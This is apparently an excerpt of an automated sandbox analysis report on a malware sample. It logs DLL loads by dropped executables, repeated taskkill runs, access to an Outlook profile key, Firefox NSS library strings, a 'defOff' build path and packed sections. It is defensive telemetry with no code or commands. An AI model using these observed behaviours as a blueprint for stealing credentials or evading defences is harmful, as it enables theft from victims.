Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: file.exe Static file information: File size 2949120 > 1048576
Source: file.exe Static PE information: Raw size of gmhlytvb is bigger than: 0x100000 < 0x2a4a00
Source: Binary string: mozglue.pdbP source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2617552023.000000006F89D000.00000002.00000001.01000000.0000000F.sdmp
Source: Binary string: nss3.pdb@ source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2617164735.000000006C73F000.00000002.00000001.01000000.0000000E.sdmp
Source: Binary string: nss3.pdb source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2617164735.000000006C73F000.00000002.00000001.01000000.0000000E.sdmp
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: DHMGC7TXSIK31JTC83MV8ND88A.exe, 00000008.00000002.2447177544.0000000000192000.00000040.00000001.01000000.0000000B.sdmp, DHMGC7TXSIK31JTC83MV8ND88A.exe, 00000008.00000003.2314064013.0000000004E40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: mozglue.pdb source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2617552023.000000006F89D000.00000002.00000001.01000000.0000000F.sdmp

Data Obfuscation

Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe Unpacked PE file: 4.2.6IF65DE3AL7UEH5E4W09DIZ.exe.f40000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ujtayirb:EW;rmnowbou:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ujtayirb:EW;rmnowbou:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 5.2.skotes.exe.490000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ujtayirb:EW;rmnowbou:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ujtayirb:EW;rmnowbou:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Unpacked PE file: 6.2.K7IHXYTNUQJPI2M9UU0ECLE1K.exe.820000.0.unpack :EW;.rsrc :W;.idata :W; :EW;rhebxyzr:EW;gzayextq:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;rhebxyzr:EW;gzayextq:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe Unpacked PE file: 8.2.DHMGC7TXSIK31JTC83MV8ND88A.exe.190000.0.unpack :EW;.rsrc:W;.idata :W;rlkngmqk:EW;jjmnbtpn:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Unpacked PE file: 10.2.e192e43b61.exe.9a0000.0.unpack :EW;.rsrc :W;.idata :W;gmhlytvb:EW;oycggmgz:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;gmhlytvb:EW;oycggmgz:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Unpacked PE file: 11.2.e192e43b61.exe.9a0000.0.unpack :EW;.rsrc :W;.idata :W;gmhlytvb:EW;oycggmgz:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;gmhlytvb:EW;oycggmgz:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe Unpacked PE file: 12.2.b0b9f39429.exe.ba0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;rhebxyzr:EW;gzayextq:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;rhebxyzr:EW;gzayextq:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Unpacked PE file: 13.2.e192e43b61.exe.9a0000.0.unpack :EW;.rsrc :W;.idata :W;gmhlytvb:EW;oycggmgz:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;gmhlytvb:EW;oycggmgz:EW;.taggant:EW;
